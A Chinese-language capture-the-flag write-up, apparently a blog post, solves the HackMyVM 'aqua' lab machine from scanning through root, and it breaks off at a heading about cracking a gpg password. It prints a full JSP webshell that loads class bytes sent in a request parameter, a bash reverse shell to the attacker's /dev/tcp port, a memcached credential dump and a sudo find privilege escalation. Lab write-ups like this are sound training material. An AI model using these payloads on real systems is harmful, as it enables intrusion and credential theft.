{"id":442,"date":"2024-03-22T16:11:23","date_gmt":"2024-03-22T08:11:23","guid":{"rendered":"http:\/\/162.14.82.114\/?p=442"},"modified":"2024-03-22T16:11:23","modified_gmt":"2024-03-22T08:11:23","slug":"hmv-_-aqua","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/442\/03\/22\/2024\/","title":{"rendered":"hmv[-_-]aqua"},"content":{"rendered":"

aqua<\/h1>\n

\"image-20240322124903989\"<\/div><\/p>\n

\u626b\u4e00\u4e0b\u770b\u770b\u80fd\u4e0d\u80fd\u626b\u5f97\u5230\uff1a<\/p>\n

\"image-20240322125044438\"<\/div><\/p>\n

\u770b\u6765\u662f\u53ef\u4ee5\u8fdb\u884c\u64cd\u4f5c\u7684\uff01<\/p>\n

\u4fe1\u606f\u641c\u96c6<\/h2>\n

\u7aef\u53e3\u626b\u63cf<\/h3>\n
nmap -Pn 10.160.78.89<\/code><\/pre>\n
PORT     STATE SERVICE\n22\/tcp   open  ssh\n80\/tcp   open  http\n8009\/tcp open  ajp13\n8080\/tcp open  http-proxy<\/code><\/pre>\n
nmap -sT -T4 -sV -p- 10.160.78.89<\/code><\/pre>\n
PORT     STATE SERVICE VERSION\n22\/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)\n80\/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))\n8009\/tcp open  ajp13   Apache Jserv (Protocol v1.3)\n8080\/tcp open  http    Apache Tomcat 8.5.5\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n
\u76ee\u5f55\u7206\u7834<\/h3>\n
\u65e2\u7136\u5f00\u542f\u4e8680<\/code>\u7aef\u53e3\uff0c\u81ea\u7136\u662f\u53ef\u4ee5\u8fdb\u884c\u76ee\u5f55\u626b\u63cf\u7684\uff1a<\/p>\n
gobuster dir -u http:\/\/10.160.78.89\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,txt,html.png,jpg<\/code><\/pre>\n
\/.php                 (Status: 403) [Size: 277]\n\/.html.png            (Status: 403) [Size: 277]\n\/img                  (Status: 301) [Size: 310] [--> http:\/\/10.160.78.89\/img\/]\n\/css                  (Status: 301) [Size: 310] [--> http:\/\/10.160.78.89\/css\/]\n\/robots.txt           (Status: 200) [Size: 33]\n\/.php                 (Status: 403) [Size: 277]\n\/.html.png            (Status: 403) [Size: 277]\n\/server-status        (Status: 403) [Size: 277]<\/code><\/pre>\n
\u6f0f\u6d1e\u6316\u6398<\/h2>\n
\u67e5\u770b\u654f\u611f\u76ee\u5f55<\/h3>\n
\u4e3b\u9875\u662f\u8fd9\u6837\u7684\uff1a<\/p>\n
\"image-20240322130024543\"<\/div><\/p>\n
\"image-20240322130244091\"<\/div><\/p>\n
\u67e5\u770b\u4e00\u4e0brobots.txt<\/code>\uff1a<\/p>\n
User-Agent: *\nDisalow: \/SuperCMS<\/code><\/pre>\n
\"image-20240322130350453\"<\/div><\/p>\n
\u653e\u5927\u4ee5\u540e\u662f\u8fd9\u4e48\u4e2a\u73a9\u610f\uff0c\u5636\u3002<\/p>\n
<!DOCTYPE html>\n<html>\n        <head>\n                <meta charset="utf-8">\n                <title>aquaMan<\/title>\n                <link href="https:\/\/fonts.googleapis.com\/css?family=Lobster" rel="stylesheet">\n        <\/head>\n    <body background="img\/img.jpg">\n    <\/body>\n<style>\n        body {\n                width: 100%;\n                height:100%;\n        }\n<\/style>\n<\/html><\/code><\/pre>\n
\u67e5\u770b\u662f\u5426\u56fe\u7247\u9690\u5199<\/h3>\n
\u4e0b\u8f7d\u4e0b\u6765\u770b\u4e00\u4e0b\uff1a<\/p>\n
wget https:\/\/fonts.googleapis.com\/css?family=Lobster\nfile css\\?family=Lobster                                    \n# css?family=Lobster: ASCII text\ncat css\\?family=Lobster\n# @font-face {\n#   font-family: 'Lobster';\n#   font-style: normal;\n#   font-weight: 400;\n#   src: url(https:\/\/fonts.gstatic.com\/s\/lobster\/v30\/neILzCirqoswsqX9zoKmNg.ttf) format('truetype');\n# }\nwget https:\/\/fonts.gstatic.com\/s\/lobster\/v30\/neILzCirqoswsqX9zoKmNg.ttf\n# neILzCirqoswsqX9zoKmNg.ttf: TrueType Font data, 17 tables, 1st "GDEF", 8 names, Microsoft, language 0x409<\/code><\/pre>\n
\u770b\u6765\u591a\u8651\u4e86\uff0c\u4e0b\u8f7d\u56fe\u7247\uff1a<\/p>\n
\"image-20240322131533124\"<\/div><\/p>\n
\u53d1\u73b0\u786e\u5b9e\u6ca1\u6709\u4e1c\u897f\uff0c\u989d\uff0c\u767d\u5fd9\u6d3b\u3002<\/p>\n
base64\u89e3\u7801\u9690\u85cf\u4fe1\u606f<\/h3>\n
\u6253\u5f00\u6e90\u7801\u7684\u65f6\u5019\u6ce8\u610f\u5230\u5728\u8d3c\u4e0b\u9762\u6709\u4e1c\u897f\uff1a<\/p>\n
MT0yID0gcGFzc3dvcmRfemlwCg==\necho "MT0yID0gcGFzc3dvcmRfemlwCg==" | base64 -d \n# 1=2 = password_zip<\/code><\/pre>\n
\u67e5\u770b\u4e3b\u9875\u5f97\u77e5\uff1a<\/p>\n
\"image-20240322132829894\"<\/div><\/p>\n
agua(1) = H2O(2) = password_zip<\/code><\/pre>\n
\u5c1d\u8bd5\u67e5\u770b\u662f\u5426\u6709\u8fd9\u4e2a\u76ee\u5f55\uff0c\u4f46\u662f\u90fd\u6ca1\u6709\u53d1\u73b0\uff0c\u5c1d\u8bd5ssh\u767b\u5f55\u4e5f\u6ca1\u6709\u6210\u529f\u3002<\/p>\n
\u68c0\u67e58009\uff0c8080\u7aef\u53e3<\/h3>\n
\"image-20240322131910530\"<\/div><\/p>\n
\u989d\uff0c\u67e5\u770b\u4e00\u4e0bTomcat 8.5.5<\/code>\u662f\u5426\u5b58\u5728\u8fdc\u7a0b\u547d\u4ee4\u6267\u884c\u7684\u6f0f\u6d1e\uff1a<\/p>\n
\"image-20240322133641517\"<\/div><\/p>\n
\u6ca1\u5565\u53d1\u73b0\uff0c\u770b\u6765\u4e0d\u662f\u4ece\u8fd9\u4e2a\u65b9\u5411\u641e\u7684\u3002<\/p>\n
\u4e8c\u6b21\u4fe1\u606f\u641c\u96c6<\/h3>\n
gobuster dir -u http:\/\/10.160.78.89\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,txt,html.png,jpg,zip<\/code><\/pre>\n
\/.html.png            (Status: 403) [Size: 277]\n\/.php                 (Status: 403) [Size: 277]\n\/img                  (Status: 301) [Size: 310] [--> http:\/\/10.160.78.89\/img\/]\n\/css                  (Status: 301) [Size: 310] [--> http:\/\/10.160.78.89\/css\/]\n\/robots.txt           (Status: 200) [Size: 33]\n\/.php                 (Status: 403) [Size: 277]\n\/.html.png            (Status: 403) [Size: 277]\n\/server-status        (Status: 403) [Size: 277]<\/code><\/pre>\n
\u6211\u8fd8\u4ee5\u4e3a\u9057\u6f0f\u4e86zip<\/code>\u6587\u4ef6\u5462\uff01<\/p>\n
sudo dirsearch -u http:\/\/10.160.78.89\/SuperCMS\/ -e* 2>\/dev\/null<\/code><\/pre>\n
  _|. _ _  _  _  _ _|_    v0.4.3\n (_||| _) (\/_(_|| (_| )\n\nExtensions: php, jsp, asp, aspx, do, action, cgi, html, htm, js, tar.gz | HTTP method: GET | Threads: 25\nWordlist size: 14594\n\nOutput File: \/home\/kali\/temp\/reports\/http_10.160.78.89\/_SuperCMS__24-03-22_01-45-39.txt\n\nTarget: http:\/\/10.160.78.89\/\n\n[01:45:39] Starting: SuperCMS\/\n[01:45:39] 301 -  318B  - \/SuperCMS\/js  ->  http:\/\/10.160.78.89\/SuperCMS\/js\/\n[01:45:40] 301 -  320B  - \/SuperCMS\/.git  ->  http:\/\/10.160.78.89\/SuperCMS\/.git\/\n[01:45:40] 200 -  420B  - \/SuperCMS\/.git\/branches\/\n[01:45:40] 200 -  607B  - \/SuperCMS\/.git\/\n[01:45:40] 200 -  645B  - \/SuperCMS\/.git\/hooks\/\n[01:45:40] 200 -  240B  - \/SuperCMS\/.git\/info\/exclude\n[01:45:40] 200 -  466B  - \/SuperCMS\/.git\/info\/\n[01:45:40] 200 -  257B  - \/SuperCMS\/.git\/config\n[01:45:40] 200 -   21B  - \/SuperCMS\/.git\/HEAD\n[01:45:40] 200 -  488B  - \/SuperCMS\/.git\/logs\/\n[01:45:40] 301 -  330B  - \/SuperCMS\/.git\/logs\/refs  ->  http:\/\/10.160.78.89\/SuperCMS\/.git\/logs\/refs\/\n[01:45:40] 301 -  336B  - \/SuperCMS\/.git\/logs\/refs\/heads  ->  http:\/\/10.160.78.89\/SuperCMS\/.git\/logs\/refs\/heads\/\n[01:45:40] 200 -   73B  - \/SuperCMS\/.git\/description\n[01:45:40] 200 -  620B  - \/SuperCMS\/.git\/index\n[01:45:40] 301 -  338B  - \/SuperCMS\/.git\/logs\/refs\/remotes  ->  http:\/\/10.160.78.89\/SuperCMS\/.git\/logs\/refs\/remotes\/\n[01:45:40] 200 -  176B  - \/SuperCMS\/.git\/logs\/refs\/remotes\/origin\/HEAD\n[01:45:40] 200 -  112B  - \/SuperCMS\/.git\/packed-refs\n[01:45:40] 200 -  480B  - \/SuperCMS\/.git\/refs\/\n[01:45:40] 301 -  331B  - \/SuperCMS\/.git\/refs\/heads  ->  http:\/\/10.160.78.89\/SuperCMS\/.git\/refs\/heads\/\n[01:45:40] 301 -  340B  - \/SuperCMS\/.git\/refs\/remotes\/origin  ->  http:\/\/10.160.78.89\/SuperCMS\/.git\/refs\/remotes\/origin\/\n[01:45:40] 200 -  659B  - \/SuperCMS\/.git\/objects\/\n[01:45:40] 200 -   30B  - \/SuperCMS\/.git\/refs\/remotes\/origin\/HEAD\n[01:45:40] 301 -  345B  - \/SuperCMS\/.git\/logs\/refs\/remotes\/origin  ->  http:\/\/10.160.78.89\/SuperCMS\/.git\/logs\/refs\/remotes\/origin\/\n[01:45:40] 301 -  330B  - \/SuperCMS\/.git\/refs\/tags  ->  http:\/\/10.160.78.89\/SuperCMS\/.git\/refs\/tags\/\n[01:45:40] 301 -  333B  - \/SuperCMS\/.git\/refs\/remotes  ->  http:\/\/10.160.78.89\/SuperCMS\/.git\/refs\/remotes\/\n[01:45:40] 200 -  176B  - \/SuperCMS\/.git\/logs\/HEAD\n[01:45:40] 403 -  277B  - \/SuperCMS\/.htaccess.bak1\n[01:45:40] 403 -  277B  - \/SuperCMS\/.ht_wsr.txt\n[01:45:40] 403 -  277B  - \/SuperCMS\/.htaccess.orig\n[01:45:40] 403 -  277B  - \/SuperCMS\/.htaccess.save\n[01:45:40] 403 -  277B  - \/SuperCMS\/.htaccess_extra\n[01:45:40] 403 -  277B  - \/SuperCMS\/.htaccess_orig\n[01:45:40] 403 -  277B  - \/SuperCMS\/.htaccess.sample\n[01:45:40] 403 -  277B  - \/SuperCMS\/.htaccessOLD2\n[01:45:40] 403 -  277B  - \/SuperCMS\/.htm\n[01:45:40] 403 -  277B  - \/SuperCMS\/.htpasswd_test\n[01:45:40] 403 -  277B  - \/SuperCMS\/.htpasswds\n[01:45:40] 403 -  277B  - \/SuperCMS\/.html\n[01:45:40] 403 -  277B  - \/SuperCMS\/.htaccessOLD\n[01:45:40] 403 -  277B  - \/SuperCMS\/.httr-oauth\n[01:45:40] 403 -  277B  - \/SuperCMS\/.htaccessBAK\n[01:45:40] 403 -  277B  - \/SuperCMS\/.htaccess_sc\n[01:45:41] 403 -  277B  - \/SuperCMS\/.php\n[01:46:00] 301 -  319B  - \/SuperCMS\/css  ->  http:\/\/10.160.78.89\/SuperCMS\/css\/\n[01:46:06] 301 -  319B  - \/SuperCMS\/img  ->  http:\/\/10.160.78.89\/SuperCMS\/img\/\n[01:46:08] 200 -  464B  - \/SuperCMS\/js\/\n[01:46:09] 200 -  779B  - \/SuperCMS\/login.html\n[01:46:20] 200 -   37B  - \/SuperCMS\/README.md\n\nTask Completed<\/code><\/pre>\n
\u6211\u64e6\u5c45\u7136\u6ca1\u6709\u626b\u51fa\u6765git\u6cc4\u9732<\/code>\uff01<\/p>\n
git\u6cc4\u9732<\/h3>\n
python2 GitHack.py http:\/\/10.160.78.89\/SuperCMS\/.git\/<\/code><\/pre>\n
\u518d\u6062\u590d\u4e00\u4e0b\uff1a<\/p>\n
\"image-20240322141156065\"<\/div><\/p>\n
\u627e\u5230knock<\/code>\u7684\u7aef\u53e3\u53f7\u4e86\uff01<\/p>\n
\u4f7f\u7528knock<\/code>\u6572\u4e00\u4e0b\u4e09\u4e2a\u7aef\u53e3\uff1a<\/p>\n
knock 10.160.78.89 1100 800 666 -v\n# hitting tcp 10.160.78.89:1100\n# hitting tcp 10.160.78.89:800\n# hitting tcp 10.160.78.89:666<\/code><\/pre>\n
\u91cd\u65b0\u626b\u63cf\u4e00\u4e0b\uff1a<\/p>\n
nmap 10.160.78.89 -sC -sV<\/code><\/pre>\n
PORT     STATE SERVICE VERSION\n21\/tcp   open  ftp     vsftpd 3.0.3\n| ftp-syst: \n|   STAT: \n| FTP server status:\n|      Connected to 10.160.78.86\n|      Logged in as ftp\n|      TYPE: ASCII\n|      Session bandwidth limit in byte\/s is 1048576\n|      Session timeout in seconds is 300\n|      Control connection is plain text\n|      Data connections will be plain text\n|      At session startup, client count was 2\n|      vsFTPd 3.0.3 - secure, fast, stable\n|_End of status\n| ftp-anon: Anonymous FTP login allowed (FTP code 230)\n|_drwxr-xr-x    2 0        0            4096 Jun 30  2021 pub\n22\/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   2048 00:11:32:04:42:e0:7f:98:29:7c:1c:2a:b8:a7:b0:4a (RSA)\n|   256 9c:92:93:eb:1c:8f:84:c8:73:af:ed:3b:65:09:e4:89 (ECDSA)\n|_  256 a8:5b:df:d0:7e:31:18:6e:57:e7:dd:6b:d5:89:44:98 (ED25519)\n80\/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))\n|_http-server-header: Apache\/2.4.29 (Ubuntu)\n|_http-title: Todo sobre el Agua\n8009\/tcp open  ajp13   Apache Jserv (Protocol v1.3)\n|_ajp-methods: Failed to get a valid response for the OPTION request\n8080\/tcp open  http    Apache Tomcat 8.5.5\n|_http-open-proxy: Proxy might be redirecting requests\n|_http-title: Apache Tomcat\/8.5.5\n|_http-favicon: Apache Tomcat\nService Info: OSs: Unix, Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n
ftp\u8fde\u63a5<\/h3>\n
ftp 10.160.78.89<\/code><\/pre>\n
# Connected to 10.160.78.89.\n# 220 (vsFTPd 3.0.3)\nName (10.160.78.89:kali): Anonymous\n# 331 Please specify the password.\nPassword: \n# 230 Login successful.\n# Remote system type is UNIX.\n# Using binary mode to transfer files.\nftp> dir\n# 229 Entering Extended Passive Mode (|||45158|)\n# 150 Here comes the directory listing.\n# drwxr-xr-x    2 0        0            4096 Jun 30  2021 pub\n# 226 Directory send OK.\nftp> cd pub\n# 250 Directory successfully changed.\nftp> dir\n# 229 Entering Extended Passive Mode (|||51104|)\n# 150 Here comes the directory listing.\n# 226 Directory send OK.\nftp> ls -la\n# 229 Entering Extended Passive Mode (|||64886|)\n# 150 Here comes the directory listing.\n# drwxr-xr-x    2 0        0            4096 Jun 30  2021 .\n# drwxr-xr-x    3 0        0            4096 Feb 03  2021 ..\n# -rw-r--r--    1 0        0            1250 Feb 03  2021 .backup.zip\n# 226 Directory send OK.\nftp> get .backup.zip\n# local: .backup.zip remote: .backup.zip\n# 229 Entering Extended Passive Mode (|||54042|)\n# 150 Opening BINARY mode data connection for .backup.zip (1250 bytes).\n# 100% |**************************************************************************|  1250       20.91 MiB\/s    00:00 ETA\n# 226 Transfer complete.\n# 1250 bytes received in 00:00 (5.49 MiB\/s)<\/code><\/pre>\n
\u89e3\u538b\u4e00\u4e0b\uff1a<\/p>\n
unzip .backup.zip\n# Archive:  .backup.zip\n#    skipping: tomcat-users.xml        need PK compat. v5.1 (can do v4.6)<\/code><\/pre>\n
\n
\u53c2\u8003\u7f51\u4e0a\u7684\u89e3\u7b54\uff0c\u53d1\u73b0\u5f97\u4f7f\u75287z<\/code>\u8fdb\u884c\u89e3\u538b\u7f29<\/p>\n
sudo apt-get install p7zip-full <\/code><\/p>\n<\/blockquote>\n
\"image-20240322142441375\"<\/div><\/p>\n
\u89e3\u538b\u5931\u8d25\u4e86\uff0c\u9700\u8981\u5bc6\u7801\uff0c\u60f3\u8d77\u4e4b\u524d\u7684\u90a3\u4e2a\u4e861=2=xxx<\/code>\uff0c\u5c1d\u8bd5\u4e00\u4e0b\uff1a<\/p>\n
aqua=H2O\naqua\nH2O<\/code><\/pre>\n
\"image-20240322142815898\"<\/div><\/p>\n
\u53d1\u73b0\u90fd\u4e0d\u5bf9\uff0c\u67e5\u4e00\u4e0b\u662f\u4e0d\u662f\u4f7f\u7528\u54ea\u91cc\u6709\u95ee\u9898\uff0c\u6ca1\u95ee\u9898\u554a\uff0c\u56de\u53bb\u91cd\u65b0\u770b\u4e86\u4e00\u4e0b\uff0c\u53d1\u73b0\u5bc6\u7801\u5199\u9519\u4e86<\/p>\n
agua=H2O\nagua\nH2O<\/code><\/pre>\n
\u90fd\u8bd5\u4e00\u4e0b\uff0c\u53d1\u73b0\u5bc6\u7801\u662fagua=H2O<\/code>\uff1a<\/p>\n
\"image-20240322144223665\"<\/div>
\n
\"image-20240322144403260\"<\/div><\/p>\n
\u7ed9\u4e86\u8d26\u53f7\u5bc6\u7801\u3002<\/p>\n
\u767b\u5f55tomcat<\/h3>\n
aquaMan\nP4st3lM4n<\/code><\/pre>\n
\"image-20240322144549810\"<\/div><\/p>\n
\u8fdb\u5165\u540e\u53f0\u4e86\uff0c\u60f3\u8d77\u4e4b\u524d\u641c\u96c6\u6f0f\u6d1e\u7684\u65f6\u5019\u53d1\u73b0\u8fd9\u4e2a\u7248\u672c\u5b58\u5728JSP<\/code>\u4e0a\u4f20\u7684\u6f0f\u6d1e\uff0c\u5c1d\u8bd5\u4e0a\u4f20\u4e00\u4e0bAntSword<\/code>\u8fde\u63a5\u7684JSP\u6728\u9a6c\uff1a<\/p>\n
\/\/ exp.jsp\n<%!\n    class U extends ClassLoader {\n        U(ClassLoader c) {\n            super(c);\n        }\n        public Class g(byte[] b) {\n            return super.defineClass(b, 0, b.length);\n        }\n    }\n\n    public byte[] base64Decode(String str) throws Exception {\n        try {\n            Class clazz = Class.forName("sun.misc.BASE64Decoder");\n            return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);\n        } catch (Exception e) {\n            Class clazz = Class.forName("java.util.Base64");\n            Object decoder = clazz.getMethod("getDecoder").invoke(null);\n            return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);\n        }\n    }\n%>\n<%\n    String cls = request.getParameter("hack");\n    if (cls != null) {\n        new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);\n    }\n%><\/code><\/pre>\n
\u4e0a\u4f20\u65f6\u5019\u53d1\u73b0\uff1a<\/p>\n
\"image-20240322145535226\"<\/div><\/p>\n
\u770b\u4e00\u4e0b\u8fd9\u4e2a\u6587\u4ef6\u662f\u5565\u4e1c\u897f\uff1a<\/p>\n
\"image-20240322145727732\"<\/div><\/p>\n
\u538b\u7f29\u4ee5\u540e\uff0c\u4fee\u6539\u540e\u7f00\u540d\u518d\u6b21\u4e0a\u4f20\uff1a<\/p>\n
\"image-20240322145824101\"<\/div>
\n
\"image-20240322145849662\"<\/div><\/p>\n
\u53ef\u4ee5\u770b\u5230\u5df2\u7ecf\u4e0a\u4f20\u6210\u529f\u4e86\uff0c\u5c1d\u8bd5\u8fde\u63a5\u4e00\u4e0b\uff1a<\/p>\n
\"image-20240322150100371\"<\/div>
\n
\"image-20240322150126239\"<\/div><\/p>\n
\u63d0\u6743<\/h2>\n
\u5f39\u4e00\u4e2a\u53cd\u5411shell<\/h3>\n
bash -c 'exec bash -i &>\/dev\/tcp\/10.160.78.86\/1234 <&1'<\/code><\/pre>\n
nc -lvnp 1234<\/code><\/pre>\n
\u641c\u96c6\u57fa\u7840\u4fe1\u606f<\/h3>\n
tomcat@Atlantis:\/$ find \/ -perm -u=s -type f 2>\/dev\/null\n# find \/ -perm -u=s -type f 2>\/dev\/null\n# \/bin\/mount\n# \/bin\/umount\n# \/bin\/su\n# \/bin\/ping\n# \/bin\/fusermount\n# \/usr\/lib\/x86_64-linux-gnu\/lxc\/lxc-user-nic\n# \/usr\/lib\/policykit-1\/polkit-agent-helper-1\n# \/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n# \/usr\/lib\/eject\/dmcrypt-get-device\n# \/usr\/lib\/openssh\/ssh-keysign\n# \/usr\/lib\/snapd\/snap-confine\n# \/usr\/bin\/newgrp\n# \/usr\/bin\/newgidmap\n# \/usr\/bin\/chfn\n# \/usr\/bin\/newuidmap\n# \/usr\/bin\/passwd\n# \/usr\/bin\/traceroute6.iputils\n# \/usr\/bin\/at\n# \/usr\/bin\/sudo\n# \/usr\/bin\/chsh\n# \/usr\/bin\/gpasswd\ntomcat@Atlantis:\/$ echo $PATH\n# echo $PATH\n# \/usr\/local\/sbin:\/usr\/local\/bin:\/usr\/sbin:\/usr\/bin:\/sbin:\/bin:\/snap\/bin\ntomcat@Atlantis:\/$ cat \/etc\/cron* \n# cat \/etc\/cron*\n# cat: \/etc\/cron.d: Is a directory\n# cat: \/etc\/cron.daily: Is a directory\n# cat: \/etc\/cron.hourly: Is a directory\n# cat: \/etc\/cron.monthly: Is a directory\n# cat: \/etc\/cron.weekly: Is a directory\n# # \/etc\/crontab: system-wide crontab\n# # Unlike any other crontab you don't have to run the `crontab'\n# # command to install the new version when you edit this file\n# # and files in \/etc\/cron.d. These files also have username fields,\n# # that none of the other crontabs do.\n\n# SHELL=\/bin\/sh\n# PATH=\/usr\/local\/sbin:\/usr\/local\/bin:\/sbin:\/bin:\/usr\/sbin:\/usr\/bin\n\n# # m h dom mon dow user  command\n# 17 *    * * *   root    cd \/ && run-parts --report \/etc\/cron.hourly\n# 25 6    * * *   root    test -x \/usr\/sbin\/anacron || ( cd \/ && run-parts --report \/etc\/cron.daily )\n# 47 6    * * 7   root    test -x \/usr\/sbin\/anacron || ( cd \/ && run-parts --report \/etc\/cron.weekly )\n# 52 6    1 * *   root    test -x \/usr\/sbin\/anacron || ( cd \/ && run-parts --report \/etc\/cron.monthly )\n# #\ntomcat@Atlantis:\/$ cat \/etc\/passwd\n# cat \/etc\/passwd\n# root:x:0:0:root:\/root:\/bin\/bash\n# daemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\n# bin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\n# sys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\n# sync:x:4:65534:sync:\/bin:\/bin\/sync\n# games:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\n# man:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\n# lp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\n# mail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\n# news:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\n# uucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\n# proxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\n# www-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\n# backup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\n# list:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\n# irc:x:39:39:ircd:\/var\/run\/ircd:\/usr\/sbin\/nologin\n# gnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\n# nobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\n# systemd-network:x:100:102:systemd Network Management,,,:\/run\/systemd\/netif:\/usr\/sbin\/nologin\n# systemd-resolve:x:101:103:systemd Resolver,,,:\/run\/systemd\/resolve:\/usr\/sbin\/nologin\n# syslog:x:102:106::\/home\/syslog:\/usr\/sbin\/nologin\n# messagebus:x:103:107::\/nonexistent:\/usr\/sbin\/nologin\n# _apt:x:104:65534::\/nonexistent:\/usr\/sbin\/nologin\n# lxd:x:105:65534::\/var\/lib\/lxd\/:\/bin\/false\n# uuidd:x:106:110::\/run\/uuidd:\/usr\/sbin\/nologin\n# dnsmasq:x:107:65534:dnsmasq,,,:\/var\/lib\/misc:\/usr\/sbin\/nologin\n# landscape:x:108:112::\/var\/lib\/landscape:\/usr\/sbin\/nologin\n# pollinate:x:109:1::\/var\/cache\/pollinate:\/bin\/false\n# sshd:x:110:65534::\/run\/sshd:\/usr\/sbin\/nologin\n# tridente:x:1000:1000:Poseidon Perez,,,:\/home\/tridente:\/bin\/bash\n# ftp:x:111:113:ftp daemon,,,:\/srv\/ftp:\/usr\/sbin\/nologin\n# tomcat:x:1001:1001::\/opt\/tomcat:\/bin\/false\n# memcache:x:112:115:Memcached,,,:\/nonexistent:\/bin\/false<\/code><\/pre>\n
tomcat@Atlantis:\/$ ps aux\n# \u5c31\u5199\u627e\u7684\u53ef\u80fd\u6709\u7528\u7684\u4e86\n# memcache   840  0.0  0.3 425800  3736 ?        Ssl  04:45   0:05 \/usr\/bin\/memcached -m 64 -p 11211 -u memcache -l 127.0.0.1\n# root       852  0.0  0.7  32968  7308 ?        Ss   04:45   0:00 \/usr\/bin\/python \/root\/server.py<\/code><\/pre>\n
\u8fde\u63a5memcache\u670d\u52a1<\/h3>\n
tomcat@Atlantis:\/$ telnet 127.0.0.1 11211\ntelnet 127.0.0.1 11211\nTrying 127.0.0.1...\nConnected to 127.0.0.1.\nEscape character is '^]'.\n?\n# ERROR\nhelp\n# ERROR\nstats\n# STAT pid 840\n# STAT uptime 9762\n# STAT time 1711092481\n# STAT version 1.5.6 Ubuntu\n# STAT libevent 2.1.8-stable\n# STAT pointer_size 64\n# STAT rusage_user 1.648555\n# STAT rusage_system 3.647246\n# STAT max_connections 1024\n# STAT curr_connections 1\n# STAT total_connections 7811\n# STAT rejected_connections 0\n# STAT connection_structures 3\n# STAT reserved_fds 20\n# STAT cmd_get 0\n# STAT cmd_set 39045\n# STAT cmd_flush 0\n# STAT cmd_touch 0\n# STAT get_hits 0\n# STAT get_misses 0\n# STAT get_expired 0\n# STAT get_flushed 0\n# STAT delete_misses 0\n# STAT delete_hits 0\n# STAT incr_misses 0\n# STAT incr_hits 0\n# STAT decr_misses 0\n# STAT decr_hits 0\n# STAT cas_misses 0\n# STAT cas_hits 0\n# STAT cas_badval 0\n# STAT touch_hits 0\n# STAT touch_misses 0\n# STAT auth_cmds 0\n# STAT auth_errors 0\n# STAT bytes_read 1304119\n# STAT bytes_written 312374\n# STAT limit_maxbytes 67108864\n# STAT accepting_conns 1\n# STAT listen_disabled_num 0\n# STAT time_in_listen_disabled_us 0\n# STAT threads 4\n# STAT conn_yields 0\n# STAT hash_power_level 16\n# STAT hash_bytes 524288\n# STAT hash_is_expanding 0\n# STAT slab_reassign_rescues 0\n# STAT slab_reassign_chunk_rescues 0\n# STAT slab_reassign_evictions_nomem 0\n# STAT slab_reassign_inline_reclaim 0\n# STAT slab_reassign_busy_items 0\n# STAT slab_reassign_busy_deletes 0\n# STAT slab_reassign_running 0\n# STAT slabs_moved 0\n# STAT lru_crawler_running 0\n# STAT lru_crawler_starts 4590\n# STAT lru_maintainer_juggles 113621\n# STAT malloc_fails 0\n# STAT log_worker_dropped 0\n# STAT log_worker_written 0\n# STAT log_watcher_skipped 0\n# STAT log_watcher_sent 0\n# STAT bytes 383\n# STAT curr_items 5\n# STAT total_items 39045\n# STAT slab_global_page_pool 0\n# STAT expired_unfetched 0\n# STAT evicted_unfetched 0\n# STAT evicted_active 0\n# STAT evictions 0\n# STAT reclaimed 0\n# STAT crawler_reclaimed 0\n# STAT crawler_items_checked 68\n# STAT lrutail_reflocked 0\n# STAT moves_to_cold 39044\n# STAT moves_to_warm 0\n# STAT moves_within_lru 0\n# STAT direct_reclaims 0\n# STAT lru_bumps_dropped 0\n# END\nstats cachedump 1 5\n# ITEM email [17 b; 0 s]\n# ITEM Name [14 b; 0 s]\n# ITEM password [18 b; 0 s]\n# ITEM username [8 b; 0 s]\n# END\nget username\n# VALUE username 0 8\n# tridente\n# END\nget password\n# VALUE password 0 18\n# N3ptun0D10sd3lM4r$\n# END<\/code><\/pre>\n
ssh\u767b\u5f55tridente<\/h3>\n
ssh tridente@10.160.78.89\nN3ptun0D10sd3lM4r$<\/code><\/pre>\n
\u4fe1\u606f\u641c\u96c6<\/h3>\n
tridente@Atlantis:~$ sudo -l\n[sudo] password for tridente: \nMatching Defaults entries for tridente on Atlantis:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin\n\nUser tridente may run the following commands on Atlantis:\n    (root) \/home\/tridente\/find<\/code><\/pre>\n
\u5229\u7528\u7279\u6743+find\u63d0\u6743<\/h3>\n
\"image-20240322153253466\"<\/div><\/p>\n
https:\/\/gtfobins.github.io\/gtfobins\/find\/<\/a><\/p>\n
\u5c1d\u8bd5\u5229\u7528\uff1a<\/p>\n
\"image-20240322153704719\"<\/div><\/p>\n
f506a6ee37275430ac07caa95914aeba<\/code><\/pre>\n
john\u7206\u7834gpg\u5bc6\u7801\u83b7\u53d6flag<\/h3>\n
